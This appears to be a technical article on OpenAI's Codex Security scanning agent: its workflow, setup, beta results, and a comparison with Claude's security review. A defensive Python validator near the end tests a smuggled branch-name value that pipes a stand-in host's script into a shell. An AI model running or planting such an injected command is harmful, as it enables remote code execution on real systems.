Codex Security Agent: Continuous Vulnerability Scanning and Automated Threat Modelling

Introduction

On 6 March 2026, OpenAI launched Codex Security — an application-security agent that scans connected repositories commit-by-commit, builds a project-specific threat model, validates findings in an isolated sandbox, and proposes patches ready for pull request [1]. The product evolved from Aardvark, a private-beta security research agent first revealed in October 2025 [2]. Within its first thirty days, the research preview scanned over 1.2 million commits across external repositories, surfacing 792 critical findings and 10,561 high-severity issues [3].

This article examines what Codex Security does, how it works under the hood, how to configure it, and how it compares to competing approaches — particularly Anthropic’s Claude Code security review.


Availability and Access

Codex Security is available as a research preview to ChatGPT Enterprise, Business, and Edu customers through the Codex web interface, with free usage for the initial month [1]. OpenAI also launched Codex for OSS, offering free ChatGPT Pro accounts and Codex Security access to open-source maintainers [4].

Currently, the feature is accessed exclusively through the Codex web UI at chatgpt.com/codex/security — there is no dedicated CLI subcommand for it yet, though the Codex CLI can be integrated into CI/CD pipelines for complementary code-quality and SAST post-processing [5].


Architecture: Three-Stage Workflow

Codex Security operates as a background agent that continuously processes commits against your configured repositories. The workflow comprises three stages: identification, validation, and remediation [2].

flowchart LR
    A[New Commits] --> B[Identification]
    B --> C{Threat Model<br/>Context}
    C --> D[Vulnerability<br/>Discovery]
    D --> E[Sandbox<br/>Validation]
    E -->|Confirmed| F[Patch<br/>Generation]
    E -->|False Positive| G[Discarded]
    F --> H[Pull Request<br/>Review]
    H --> I[Human<br/>Approval]

    style B fill:#f9d71c,stroke:#333
    style E fill:#ff6b6b,stroke:#333
    style F fill:#51cf66,stroke:#333

Stage 1: Identification

When connected to a repository, the agent scans commits in reverse chronological order, building a codebase-specific threat model that captures attacker entry points, trust boundaries, sensitive data paths, and high-impact code paths [2]. Unlike traditional SAST tools that rely on pattern matching or fuzzing, Codex Security uses language-model reasoning, test-time compute, tool use, and large context windows to explore realistic attack scenarios [3].
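
The threat-model artefact described above can be pictured as a small data structure that accumulates observations commit by commit. The sketch below is purely illustrative: the class shape, field names, and merge logic are assumptions, not the product's internal format.

```python
from dataclasses import dataclass, field

@dataclass
class ThreatModel:
    """Illustrative threat model holding the categories Codex Security
    is described as capturing (hypothetical structure)."""
    entry_points: list[str] = field(default_factory=list)      # untrusted inputs
    trust_boundaries: list[str] = field(default_factory=list)  # auth perimeters
    sensitive_paths: list[str] = field(default_factory=list)   # data needing protection
    priority_areas: list[str] = field(default_factory=list)    # team-requested focus

    def merge_commit_observations(self, observations: dict[str, list[str]]) -> None:
        """Fold one commit's observations into the model, deduplicating."""
        for category, items in observations.items():
            current = getattr(self, category)
            for item in items:
                if item not in current:
                    current.append(item)

# Scanning commits newest-first, each contributing observations
model = ThreatModel()
for commit_obs in [
    {"entry_points": ["POST /api/account"], "trust_boundaries": ["auth-service"]},
    {"entry_points": ["POST /api/account", "file upload"], "sensitive_paths": ["billing writes"]},
]:
    model.merge_commit_observations(commit_obs)

print(model.entry_points)  # deduplicated across commits
```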

Stage 2: Validation

High-signal findings are passed to an isolated sandbox environment where the agent attempts to reproduce each issue — capturing execution details and confirming exploitability before surfacing the finding [2]. This validation step is critical: during the beta period, it contributed to an 84% reduction in overall noise, a 90% drop in over-reported severity, and a 50% decrease in false-positive rates [3].

Stage 3: Remediation

For each confirmed vulnerability, the agent generates a concrete patch with a plain-language explanation. Patches do not modify code automatically — they are surfaced for human review and can be raised as pull requests through the standard development workflow [2].


Setting Up a Security Scan

Prerequisites

You need an active Codex Cloud environment with your GitHub repository connected. Navigate to Codex environments (chatgpt.com/codex/settings/environments) to create one if it does not already exist [6].

Creating a Scan

Visit chatgpt.com/codex/security/scans/new and configure the following [6]:

  1. GitHub organisation — select the org owning the target repository
  2. Repository — the specific repo to scan
  3. Branch — the branch to monitor (typically main)
  4. Environment — assign the Codex Cloud environment
  5. History window — longer windows provide more context but require extended backfill time

The initial backfill can take several hours for larger repositories as the agent processes historical commits to build its threat model [6].

Reviewing Findings

Once findings appear, access them at chatgpt.com/codex/security/findings. Two views are available [6]:

  • Recommended Findings — the top 10 most critical issues
  • All Findings — a complete sortable, filterable table with description, metadata, code excerpts, and validation steps
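
The two views amount to sorting and slicing a findings table. The snippet below mimics them with made-up findings; the severity ranking and field names are assumptions for illustration only.

```python
# Hypothetical findings, shaped like the dashboard's table columns
findings = [
    {"id": "F-101", "severity": "high",     "title": "JWT audience not checked"},
    {"id": "F-102", "severity": "critical", "title": "SQL injection in billing export"},
    {"id": "F-103", "severity": "medium",   "title": "Verbose error leaks stack trace"},
    {"id": "F-104", "severity": "critical", "title": "Path traversal in upload parser"},
]

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}

# "All Findings": the full table, here sorted by severity
all_findings = sorted(findings, key=lambda f: SEVERITY_RANK[f["severity"]])

# "Recommended Findings": the most critical slice (the product shows 10)
recommended = all_findings[:10]

print([f["id"] for f in recommended])
```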

The Threat Model: Codex Security’s Core Differentiator

The project-specific threat model is what separates Codex Security from traditional scanners. Rather than applying generic rules, the agent builds a contextual understanding of your system’s architecture [7].

A useful threat model identifies:

  • Entry points and untrusted inputs — where external data enters the system
  • Trust boundaries and auth assumptions — security perimeters and authentication logic
  • Sensitive data paths — critical operations requiring protection
  • Priority review areas — regions your team wants examined first

Example Threat Model

Public API for account changes. Accepts JSON requests and file uploads.
Uses an internal auth service for identity checks and writes billing
changes through an internal service. Focus review on auth checks,
upload parsing, and service-to-service trust boundaries.

Editing and Refining

The threat model is editable through the scan dashboard. OpenAI recommends exporting the current model, refining it conversationally within Codex, and reimporting the updated version [7]. When you adjust the criticality of a finding, the agent uses that feedback to refine the model and improve precision on subsequent runs — a form of adaptive learning that tunes results to your architecture and risk posture [2].

flowchart TD
    A[Initial Scan] --> B[Auto-generated<br/>Threat Model]
    B --> C[Findings<br/>Surfaced]
    C --> D{Developer<br/>Feedback}
    D -->|Adjust Criticality| E[Refined<br/>Threat Model]
    D -->|Edit Model| E
    E --> F[Improved<br/>Subsequent Scans]
    F --> C

    style D fill:#f9d71c,stroke:#333
    style E fill:#51cf66,stroke:#333
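
One way to picture this adaptive loop is as per-category weights nudged by developer feedback. The sketch below is illustrative only; OpenAI has not documented the actual mechanism, and the category names and step size are invented.

```python
# Illustrative: per-category finding weights adjusted by criticality feedback
weights = {"auth": 1.0, "upload-parsing": 1.0, "logging": 1.0}

def apply_feedback(category: str, developer_rating: int, agent_rating: int,
                   step: float = 0.1) -> None:
    """Nudge a category's weight towards the developer's view of criticality.

    If the developer rates an issue higher than the agent did, the category
    is weighted up on subsequent runs; if lower, it is weighted down.
    """
    delta = developer_rating - agent_rating
    weights[category] = max(0.1, weights[category] + step * delta)

apply_feedback("auth", developer_rating=5, agent_rating=3)     # under-rated: boost
apply_feedback("logging", developer_rating=1, agent_rating=4)  # over-rated: damp

print(weights["auth"], weights["logging"])
```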

Beta Results and Real-World Impact

The numbers from the first thirty days of the research preview are striking [3]:

| Metric | Value |
| --- | --- |
| Commits scanned | 1.2 million+ |
| Critical findings | 792 |
| High-severity findings | 10,561 |
| Critical issue rate | < 0.1% of commits |
| Noise reduction | 84% |
| Over-reported severity drop | 90% |
| False-positive reduction | 50% |
| CVEs assigned | 14 |
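
As a sanity check, the "< 0.1% of commits" figure is consistent with the raw counts:

```python
# Critical findings as a share of commits scanned
critical = 792
commits = 1_200_000  # "1.2 million+", so the true rate is at most this

rate = critical / commits
print(f"{rate:.4%}")
assert rate < 0.001  # i.e. below 0.1% of commits
```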

The 14 assigned CVEs span projects including PHP, libssh, Chromium, GOGS, Thorium, GnuPG, and GnuTLS [3]. NETGEAR, an early-access partner, reported that the tool “integrated effortlessly into our robust security development environment” and that findings often felt like having “an experienced product security researcher working alongside the team” [4].


CI/CD Integration with Codex CLI

While Codex Security itself runs through the web interface, the Codex CLI and Codex GitHub Action can complement it within CI/CD pipelines [5]. The OpenAI Cookbook demonstrates a GitLab integration pattern where Codex CLI post-processes existing SAST results to consolidate duplicates, rank issues by exploitability, and provide actionable remediation steps [5].

# GitLab CI job using Codex CLI for security post-processing
codex exec --full-auto \
  "Analyse the SAST report at gl-sast-report.json. \
   Consolidate duplicates, rank by exploitability, \
   and output remediation steps as CodeClimate JSON."

For fully automated CI environments, the --dangerously-bypass-approvals-and-sandbox flag is available — but it should only be used in isolated runners, never on developer machines [8].


Comparison: Codex Security vs Claude Code Security Review

Anthropic launched Claude Code Security approximately two weeks before Codex Security, creating a direct competitive dynamic [9]. The approaches differ fundamentally:

| Aspect | Codex Security | Claude Code Security |
| --- | --- | --- |
| Scanning model | Continuous, commit-by-commit background agent | On-demand /security-review command |
| Sandboxing | Kernel-level (macOS Seatbelt, Linux Landlock/seccomp) | Application-layer hooks |
| Threat modelling | Auto-generated, editable, adaptive | Manual review scope |
| Validation | Sandbox reproduction of exploits | Static analysis with model reasoning |
| Enterprise compliance | GitHub Enterprise integration | SOC 2 Type II, HIPAA, zero data retention |
| Primary strength | Continuous monitoring, low false positives | Flexible governance, multi-agent review |

A DryRun Security study in March 2026 tested all three major AI coding agents (Codex, Claude, Gemini) building real applications. In the final vulnerability counts, Codex produced the fewest remaining issues (8), compared to Claude (13) and Gemini (11) [10]. However, the study also found that broken access control appeared across all three agents — security is not yet part of their default reasoning [10].

The emerging consensus is that neither tool alone is sufficient. Running both costs roughly 2× per review but catches meaningfully more issues, as different models trained on different data surface different vulnerability classes [9].


Security Considerations

Ironically, Codex itself was subject to a critical vulnerability discovered by Phantom Labs (BeyondTrust). A command injection flaw in the branch name parameter — passed unsanitised into a shell command during container setup — could have exposed GitHub authentication tokens [11]. The vulnerability affected Codex CLI, Codex SDK, and the IDE extension, and was patched on 5 February 2026 after responsible disclosure on 16 December 2025 [11].

This incident underscores a broader point made by Check Point Research: “Don’t assume AI tools are secure by default” [11]. As AI agents consume branch names, commit messages, issue titles, and PR bodies, these inputs become attack surfaces in their own right.
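
The class of bug behind the Codex incident, interpolating a branch name into a shell string, is avoided by validating the input and passing it as a single argv element rather than through a shell. A minimal sketch follows; the allow-list pattern is an assumption, so adapt it to your own naming rules.

```python
import re

# Conservative allow-list for branch names consumed by automation;
# this pattern is an assumption, tighten it to match your conventions.
BRANCH_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._/-]{0,200}$")

def safe_checkout_cmd(branch: str) -> list[str]:
    """Build a git command with the branch as its own argv element.

    Passing a list to subprocess.run() avoids the shell entirely, so
    metacharacters like `;`, `|`, and `$(...)` are never interpreted.
    """
    if not BRANCH_RE.fullmatch(branch):
        raise ValueError(f"refusing suspicious branch name: {branch!r}")
    return ["git", "checkout", branch]

# A hostile branch name is rejected before any process is spawned
try:
    safe_checkout_cmd("main; curl evil.example | sh")
except ValueError as err:
    print(err)

print(safe_checkout_cmd("feature/login-fix"))
```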


Practical Recommendations

  1. Start with the threat model — invest time editing it to reflect your actual architecture before judging finding quality
  2. Use the feedback loop — adjust criticality ratings to train the agent towards your risk posture
  3. Complement with CI/CD — pair Codex Security’s continuous scanning with Codex CLI in your pipeline for SAST post-processing
  4. Layer your tools — consider running both Codex Security and Claude Code security review for maximum coverage
  5. Audit your attack surface — treat all agent-consumed inputs (branch names, PR titles, commit messages) as untrusted data

Citations